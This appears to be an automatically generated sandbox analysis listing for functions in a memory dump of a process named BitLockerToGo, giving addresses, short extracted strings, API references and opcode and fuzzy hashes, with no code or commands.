Opcode ID: 3ce819acb7ad41694156ad224cd28f0d90866f8648da3882328b57c308dd4e5a
Instruction ID: 7196e7959c5fb11bc3ffe057c3fc74b5b4201d288a2a360d36f20a5bf53a4505
Opcode Fuzzy Hash: 3ce819acb7ad41694156ad224cd28f0d90866f8648da3882328b57c308dd4e5a
Instruction Fuzzy Hash: CB71CE725083658FD320CF25984075FFBE4EBC5714F45892DE8E9AB281D7B8C60A8BD6

Function 0040E8D6 Relevance: 3.8, Strings: 3, Instructions: 52COMMON

Download Yara Rule

Strings

j, xrefs: 0040E91D
:g;1, xrefs: 0040E8DE
%!-0, xrefs: 0040E906

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %!-0$:g;1$j
API String ID: 0-565037024
Opcode ID: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
Instruction ID: 32df4f5ca928b1c4db86954fec2fd0b7d1b741fb7c4248b2e7c729c7ce3ce05b
Opcode Fuzzy Hash: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
Instruction Fuzzy Hash: D111BFB0209380CBC3558F3A945052BFBE0EB82708F585E6DE0D27B391D374CD1A9B4A

Function 0040E996 Relevance: 3.8, Strings: 3, Instructions: 25COMMON

Download Yara Rule

Strings

:g;1, xrefs: 0040E99E
%!-0, xrefs: 0040E9C6
j, xrefs: 0040E9DD

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %!-0$:g;1$j
API String ID: 0-565037024
Opcode ID: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
Instruction ID: 596850defd4a036336a324cb21a7a3242656b73628fcb9d0064f5a2a21d3f7d4
Opcode Fuzzy Hash: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
Instruction Fuzzy Hash: A8F044A00083408BC7018F29955141BFFE0FB96218F806E2CE0E67B282D3B4C60A8B4B

Function 0042B7D9 Relevance: 3.2, Strings: 2, Instructions: 674COMMON

Download Yara Rule

Strings

E!~#, xrefs: 0042B906
lm, xrefs: 0042B8A6

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: E!~#$lm
API String ID: 0-1992677951
Opcode ID: 9a096487ad9609a24de47d8df282907d8779bda7efe842b7f00f4c774632a873
Instruction ID: 61cc5eccec049af0e54bbe6b7867e08c0ec63a84f8db0f325e500e79ab1311da
Opcode Fuzzy Hash: 9a096487ad9609a24de47d8df282907d8779bda7efe842b7f00f4c774632a873
Instruction Fuzzy Hash: F03212B5A09351DFE310CF24E88071BBBE2EFCA314F188A6DE99597391D735D9048B86

Function 0042B7FE Relevance: 3.1, Strings: 2, Instructions: 613COMMON

Download Yara Rule

Strings

E!~#, xrefs: 0042B906
lm, xrefs: 0042B8A6

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: E!~#$lm
API String ID: 0-1992677951
Opcode ID: 92a119be01d726839c28c3877fef4819ee7d8ff70b1aba41b8b41df50f7b9339
Instruction ID: 7bed8695027210ac92da4346b897ac20d0c44e99a9f91174413a0fc9cc9c1dae
Opcode Fuzzy Hash: 92a119be01d726839c28c3877fef4819ee7d8ff70b1aba41b8b41df50f7b9339
Instruction Fuzzy Hash: 102200B5A09341DFE310CF24E88071BBBE2FBCA314F198A6DE59997291D735D904CB86

Function 004226A0 Relevance: 3.0, Strings: 2, Instructions: 480COMMON

Download Yara Rule

Strings

%B, xrefs: 004226AF, 004227F1
WV%', xrefs: 00422B64

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: WV%'$%B
API String ID: 0-3431559777
Opcode ID: 4cd629bfa35b357c2183a7e03bffbb6138099c49bf31991c5e05be8ad07f076a
Instruction ID: 0337a8c4afef9036889a0d9800bd6c0db52e849100078b37d2d4a7eb4ae48cf8
Opcode Fuzzy Hash: 4cd629bfa35b357c2183a7e03bffbb6138099c49bf31991c5e05be8ad07f076a
Instruction Fuzzy Hash: 0CE116B6A08360ABE3119F25EC8176BBBD5EFC5304F08892EF8C15B381D6799D058797

Function 004038E0 Relevance: 2.9, Strings: 2, Instructions: 404COMMON

Download Yara Rule

Strings

Inf, xrefs: 00403933
NaN, xrefs: 0040393A

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: 8c633ab387c472aceacd5155ac3652b92df09b65cdf6b1fba8d177e5b571defe
Instruction ID: a9254e64c959a8bfad86f0ec2812b5bfd1bc50255f1498efd36873cac5a2b09f
Opcode Fuzzy Hash: 8c633ab387c472aceacd5155ac3652b92df09b65cdf6b1fba8d177e5b571defe
Instruction Fuzzy Hash: 82D1D372A083119BC704CF28C88061BBBE5EFC4751F258A3EE899A73D1E775DD458B86

Function 004094BF Relevance: 2.8, Strings: 2, Instructions: 305COMMON

Download Yara Rule

Strings

8, xrefs: 0040989B
0, xrefs: 004098A3

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 3d1232e5ee38a6dc674e9cd38ea0c168e999e0bdccea66919b4ed16b874e07e4
Instruction ID: 3a2969e8e4a150ec752faa6b7bb4f9d2373db3f757712a748a1d7683f594a644
Opcode Fuzzy Hash: 3d1232e5ee38a6dc674e9cd38ea0c168e999e0bdccea66919b4ed16b874e07e4
Instruction Fuzzy Hash: EEE11E75608380DFC750CF28D844A8BBBE1BB8A314F45896DF88897352D335EA58DF82

Function 004433B0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON

Download Yara Rule

Strings

"5D, xrefs: 004434F8

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "5D
API String ID: 0-386403491
Opcode ID: 35056113c60dbd41f8426ba1490496434605cc7e9e6b29d771693653d0998dbf
Instruction ID: d7a0add943f148724df6d99197c8bd1c248c42391e822a4ab72d2176c05d2b00
Opcode Fuzzy Hash: 35056113c60dbd41f8426ba1490496434605cc7e9e6b29d771693653d0998dbf
Instruction Fuzzy Hash: 1D02F135A05215CFDB18CF68D8906AEB7F2FB8A315F19807EC846A7342D735AD06CB94

Function 00404FA0 Relevance: 1.8, Strings: 1, Instructions: 514COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 00405308

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: a0efada6e2ecaa55edc2979e96968af4631c15e7a90beed605ae9f593a3e7906
Instruction ID: e1a2e6bddeb3bba5b129c19328ccd72471c928e1af9c29e7c829fcd700668d1b
Opcode Fuzzy Hash: a0efada6e2ecaa55edc2979e96968af4631c15e7a90beed605ae9f593a3e7906
Instruction Fuzzy Hash: 2602E771608B418BE7148E54D88032BBBE2EF91304F18857ED899AB3D5E779DC45CF4A

Function 00425F00 Relevance: 1.8, APIs: 1, Instructions: 251comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004479D8,00000000,00000001,004479C8), ref: 00425F29

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 6e3a031c0afa7cf2364f65541825ecbcb683ae6c1c017608a85ef565e3a7ea66
Instruction ID: eec0e6367e40af910e4f38a67743c5664d32b682df124dc662bb51fbbca82cfa
Opcode Fuzzy Hash: 6e3a031c0afa7cf2364f65541825ecbcb683ae6c1c017608a85ef565e3a7ea66
Instruction Fuzzy Hash: F861CDB13002209BDB20DB24DC92B7733A4EF85758F458559FA46CB391E779E801C76A

Function 0042E400 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

", xrefs: 0042E6E8

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 93ecab8819888c1490301e4ea4446f15b79a23bacf294943aa3e848e668045df
Instruction ID: 68251316c82459e1b79cf8655833eab7d307529819052df6cdad143cf461d429
Opcode Fuzzy Hash: 93ecab8819888c1490301e4ea4446f15b79a23bacf294943aa3e848e668045df
Instruction Fuzzy Hash: 48C13AB2B043205BD714DE26E49076BB7E5AF84354F98892FE89587382E73CEC44C796

Function 00442380 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

<?=1, xrefs: 00442382

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: <?=1
API String ID: 0-2411229740
Opcode ID: 6f49592b968a8246a533a20448b8e131cee92a39c12d3206dffe49dd85b4513a
Instruction ID: 2e054955defad10f31ce74d0ada4916bcd4f55c111b01029528ae33fccb987f7
Opcode Fuzzy Hash: 6f49592b968a8246a533a20448b8e131cee92a39c12d3206dffe49dd85b4513a
Instruction Fuzzy Hash: EBB188B2B043105BF3149E29CD8176FB7D69BC0318F48863EF99597381EAB8EC058796

Function 004335B0 Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 004336B7

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: 42868364cf3e2125bc7d83ba8713966cf3f4fbc2b2966717fb02cc9df0e5f423
Instruction ID: 9fa629f37c638174913251febcb0f2480677ef83720be47297878a7efbf2bf27
Opcode Fuzzy Hash: 42868364cf3e2125bc7d83ba8713966cf3f4fbc2b2966717fb02cc9df0e5f423
Instruction Fuzzy Hash: 76A15973F195914BC7188E7C8C523ADAA935B9A331F2D937BD8B1DB3E4C62C89028355

Function 00421333 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

US, xrefs: 004210B4

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: US
API String ID: 0-1549774597
Opcode ID: 40c57cd8e3745a142ea7a9c493a00c5e26e3ea1eaa4ddc22655fa54c1efa7ee4
Instruction ID: 3024a2b3aec96dee861537dac0de769f6ce30434eb834ac09468a51a814e571a
Opcode Fuzzy Hash: 40c57cd8e3745a142ea7a9c493a00c5e26e3ea1eaa4ddc22655fa54c1efa7ee4
Instruction Fuzzy Hash: BD818EB1A00215CBCB10CF64D8926B7B3B0FF55364F18815AD8566F7A1E339D912CB98

Function 0040A730 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 0040A866

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: bf3db2b8066e96c9336f5aa779e0e9fb48e5f2431a0bb933a32df031d09419f1
Instruction ID: 97426e9ad6401b0006cc9dbd019e6bbf661e4b41d0d83b181ff8c1a914b3c011
Opcode Fuzzy Hash: bf3db2b8066e96c9336f5aa779e0e9fb48e5f2431a0bb933a32df031d09419f1
Instruction Fuzzy Hash: F3B128712083819FD325CF18C98061BFBE0AFA9704F448E2EE5D997782D635E918CB67

Function 0043F7E0 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

InA>, xrefs: 0043F8A0

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>
API String ID: 2994545307-2903657838
Opcode ID: e049606c169951e19221e3ad5ade3226a053a4dbaa04318920fabf1709692af5
Instruction ID: 67eb01b019c0e27b89a240b1cc11858b2d7ab5932ea24ba076d86815e27896ea
Opcode Fuzzy Hash: e049606c169951e19221e3ad5ade3226a053a4dbaa04318920fabf1709692af5
Instruction Fuzzy Hash: 14710872A083016FD718DE28C884B3BBBE2AFC8314F14953EE99587355D679DC09978A

Function 0042E870 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042EA6E

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: b5b56033d86e36a5a2f775e18004cfca431a6ac7bf94099ec4257ac67d618ec2
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 80710D32B083354BD714CE2AD48031FBBE2ABC5710F99896FE4D597351D639EC45878A

Function 0043E230 Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

;:54, xrefs: 0043E45D

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54
API String ID: 2994545307-2887251705
Opcode ID: df7bf6eae7a36913a9ec1baeb6ecb24d678c504a8aa5a533fe4d2eafb1652e91
Instruction ID: 4f1faff941bef89663bb3637ce6dc0c7fe8d37f62b08c470a52496a998cad0a7
Opcode Fuzzy Hash: df7bf6eae7a36913a9ec1baeb6ecb24d678c504a8aa5a533fe4d2eafb1652e91
Instruction Fuzzy Hash: 16513373B153105BDB18CA2ACC8073BB693ABD8324F19D52EEDD59B391E6389C418786

Function 0042762D Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

kxB, xrefs: 00427865

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: kxB
API String ID: 0-3304533649
Opcode ID: a5b45d38ed878a69c4ddfdbaad831e661abb72e9bdbb0231741d2d5f1995a94e
Instruction ID: 88173e66428cdd7c6d01174d66c67448d39acf5630705fd552277d34938965d0
Opcode Fuzzy Hash: a5b45d38ed878a69c4ddfdbaad831e661abb72e9bdbb0231741d2d5f1995a94e
Instruction Fuzzy Hash: A751E0B56046108FEB108F66D8D16AA7FB1EF92320F5496ACDD555F28AC774C842CF88

Function 0041482A Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

+, xrefs: 00414930

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: +
API String ID: 2994545307-2126386893
Opcode ID: 40714f07f1c99aeef1326abce0824c78b02b0e3c58205b48cd5dacd57f9cbd65
Instruction ID: 498670c93085af96df0a13cc51bf38c594cd24572fd0aff5e635dffd13fe934e
Opcode Fuzzy Hash: 40714f07f1c99aeef1326abce0824c78b02b0e3c58205b48cd5dacd57f9cbd65
Instruction Fuzzy Hash: 87510775208B808FD319CB38C8943A77BD2ABD6314F19861ED1EB877C2C739A846CB45

Function 0042CEDA Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

;:54, xrefs: 0042CEFC

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ;:54
API String ID: 0-2887251705
Opcode ID: d320a364d458c4f12b5ab96ddb1ec6b204cae623072d35a93d7e27a7fe08aee9
Instruction ID: a6f6f25a51f5e52a44388338aa3e144efc2bcfc1fab5ec9bc31da552ce81e20e
Opcode Fuzzy Hash: d320a364d458c4f12b5ab96ddb1ec6b204cae623072d35a93d7e27a7fe08aee9
Instruction Fuzzy Hash: BB01BC357083009BE7188F10A9C163BB363EB96354F29986ED58927656C378DC468B9A

Function 0040BD70 Relevance: .8, Instructions: 830COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3165bc55115523de59345c5195674b73c5ddc2ef69068c5c63219a4f04796b64
Instruction ID: 43d6a5726a373e8c39e909410f93e99c00a84564b048315635d04c4f37bc70f7
Opcode Fuzzy Hash: 3165bc55115523de59345c5195674b73c5ddc2ef69068c5c63219a4f04796b64
Instruction Fuzzy Hash: 3E52A231508311CBC725DF18E8802ABB3E1FFD4315F258A3ED996A7385D739A855CB8A

Function 0040B260 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02c6c3d2b0811d51f91604d888d7a87fb23702d8e23daa9eb0161bf85fa67fc
Instruction ID: f32606df8dbbff4b77b7b1d8e2dd0e2ce687df4bd0f3d3c94721d8542b5309c3
Opcode Fuzzy Hash: b02c6c3d2b0811d51f91604d888d7a87fb23702d8e23daa9eb0161bf85fa67fc
Instruction Fuzzy Hash: AF52A1B09087888FE7359B24C4847A7BBE1EB51314F14893EC5E616BC2C37DA985C79E

Function 00406F60 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36b86faa8d1ccc44319ff8b12de4c9a00c6cc4713396a6e4696e49310e88840
Instruction ID: 8e97567e83ea3664aeac48b2500351e49d631ae727d0b3c5c75974dcbe17acfc
Opcode Fuzzy Hash: e36b86faa8d1ccc44319ff8b12de4c9a00c6cc4713396a6e4696e49310e88840
Instruction Fuzzy Hash: E952D67190C3459FCB14CF24C4906AABBE1FF89314F198A7EE89967391D738E845CB86

Function 00407960 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f97ce962b784614838efb764175055c1fcd132e5241a94047a32417bb2f6c2
Instruction ID: bc93c1e37dcf9fbd5faeede11be3ee631fa92aa21ed78e44acb372cfb5674b4c
Opcode Fuzzy Hash: d0f97ce962b784614838efb764175055c1fcd132e5241a94047a32417bb2f6c2
Instruction Fuzzy Hash: 45423670A19B118FC368CF29C690526B7F2BF85310B604A2ED69797F90D73AF845CB19

Function 00441720 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b1c0f5a7b546f4d153a417e5f5d0868e70a01fca9bbb907ba0b13a7a0d58b8
Instruction ID: 54dc22799c33e5f30e9c08018129e0ce983c2b02d0a70579d262adcf57ac8fca
Opcode Fuzzy Hash: 59b1c0f5a7b546f4d153a417e5f5d0868e70a01fca9bbb907ba0b13a7a0d58b8
Instruction Fuzzy Hash: 49F13536A08395CFC314CF39D89012AB7E2FB8A311F19867DD99587392E739E941CB45

Function 0040A270 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e88b7cbd39bbd3665fdfcbb4fcb2809eb00c2d7e36ac19dd5f7b175e2c8b1d
Instruction ID: aa2e20079a1c33403b18436d2bb8baf3f0454839c40cdfcc61d75fab929f7d22
Opcode Fuzzy Hash: d8e88b7cbd39bbd3665fdfcbb4fcb2809eb00c2d7e36ac19dd5f7b175e2c8b1d
Instruction Fuzzy Hash: 3EE16971208341CFC720DF29C880A6BBBE1AF99304F448D2EE4D597791E779E958CB96

Function 00429494 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd25139e4cffdd6a28b3866882d8c9b9012973d630cb330dd150d93b9f39d31
Instruction ID: 6f78ba75e857fc460744ea3bf40bf060d657cbc759e8f815b1718fecd29e30b7
Opcode Fuzzy Hash: 7bd25139e4cffdd6a28b3866882d8c9b9012973d630cb330dd150d93b9f39d31
Instruction Fuzzy Hash: B1D13672A583618BD324DF28D4413ABB7E1EB96350F58892ED4C987341E73CDC4AD78A

Function 00443720 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ff9693df6bf70c0841e9182befa73d77b127f566fea254279336c35b952eb2
Instruction ID: 1bb81eb731d0dcd2e931e8a05a9d9ebd5cbd5509060ea70f8d3fa45d3e7787eb
Opcode Fuzzy Hash: 60ff9693df6bf70c0841e9182befa73d77b127f566fea254279336c35b952eb2
Instruction Fuzzy Hash: ADA1FF39A05215CFDB08CF68D8902AEB7F2FF8A315F19847DC946A7741D335AA06CB94

Function 00441F80 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3839fa6248517d0c5b23b453063a8680550929f932afd0a9389f07cbb5ab4e34
Instruction ID: 3f1a5d58ad977ff914d439cacd2de76540a7a2ef22258d9900107c0cfd5d2fc9
Opcode Fuzzy Hash: 3839fa6248517d0c5b23b453063a8680550929f932afd0a9389f07cbb5ab4e34
Instruction Fuzzy Hash: 86A12732B083115FE728CE38CD4176BB6E2FBC9314F58892EFA95D7385E67898418746

Function 00414BBF Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4c3b8aba72e7172d7add01e2aabadb7e5dfcd467ba605d0a7c12eee022218
Instruction ID: dce3f7253bf703894e90d01f41a8ac4e1b37e895c6d00e50f011b05014328ec4
Opcode Fuzzy Hash: a1a4c3b8aba72e7172d7add01e2aabadb7e5dfcd467ba605d0a7c12eee022218
Instruction Fuzzy Hash: 37C11972604B408FC724DF38C8553A6BBE2ABDA314F198E6DD4EB87792D639D842C711

Function 0042CA72 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dac00791858fab75043c3ebe8725bd6b90e717e613227aa0d7df2b38d43a0c8
Instruction ID: 675397662e7d35c3e988c68934b2adc1cfbc6c7944ee00e9ec449aaad2b39987
Opcode Fuzzy Hash: 3dac00791858fab75043c3ebe8725bd6b90e717e613227aa0d7df2b38d43a0c8
Instruction Fuzzy Hash: 32911271A483258BD320EF55D89172BB3A1FFD1354F48892EE8C54B390E778D905CB9A

Function 00444C50 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7788459da579a406017a81a97166ef367627d5843ecec10b45f7f04a8ae79cb3
Instruction ID: 6319082f14ba8b4099234a42a38b7f19144b033db610fd0ee0d2447741a842e8
Opcode Fuzzy Hash: 7788459da579a406017a81a97166ef367627d5843ecec10b45f7f04a8ae79cb3
Instruction Fuzzy Hash: 4B91E136A083219BE724CF18D88066BB7E2FFD9710F19852DE9819B350DB35EC45C786

Function 0040ADD0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb38836aa2fc0c02311f2ee4b3c29a57ce834601b3de9f78f5398ad176a45f4
Instruction ID: e9a1152d571da6373df0051c1ca658753352748046f568740452c92ff782732b
Opcode Fuzzy Hash: 5bb38836aa2fc0c02311f2ee4b3c29a57ce834601b3de9f78f5398ad176a45f4
Instruction Fuzzy Hash: B5C16DB29487418FC320CF28CC96BABB7E1FF85318F08492DD1D9D6242D778A155CB4A

Function 00444920 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2571086043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

